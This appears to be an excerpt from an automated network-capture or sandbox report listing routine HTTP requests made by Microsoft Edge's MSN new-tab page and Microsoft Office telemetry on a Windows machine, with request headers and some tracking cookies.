Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=1CE105B96555657E15301092645D6402&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=f04ef2b2bde340d3aa91191e3e2aacf2 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1CE105B96555657E15301092645D6402; _EDGE_S=F=1&SID=017BF83314C2695A3E08ED1815CC6818; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msBaE.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA11MSkH.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1730573530887&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1CE105B96555657E15301092645D6402&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1730573530886&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=980504227edf4b1b8a8130fae97c5e75&activityId=980504227edf4b1b8a8130fae97c5e75&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1CE105B96555657E15301092645D6402; _EDGE_S=F=1&SID=017BF83314C2695A3E08ED1815CC6818; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1730573530887&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1CE105B96555657E15301092645D6402&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1113b838f34ae8d1a285d701730566614; XID=1113b838f34ae8d1a285d701730566614
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1730573530886&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=980504227edf4b1b8a8130fae97c5e75&activityId=980504227edf4b1b8a8130fae97c5e75&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=EAAC199B51F748AB8A644B0DA99B5A53&MUID=1CE105B96555657E15301092645D6402 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1CE105B96555657E15301092645D6402; _EDGE_S=F=1&SID=017BF83314C2695A3E08ED1815CC6818; _EDGE_V=1; msnup=; SM=T
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
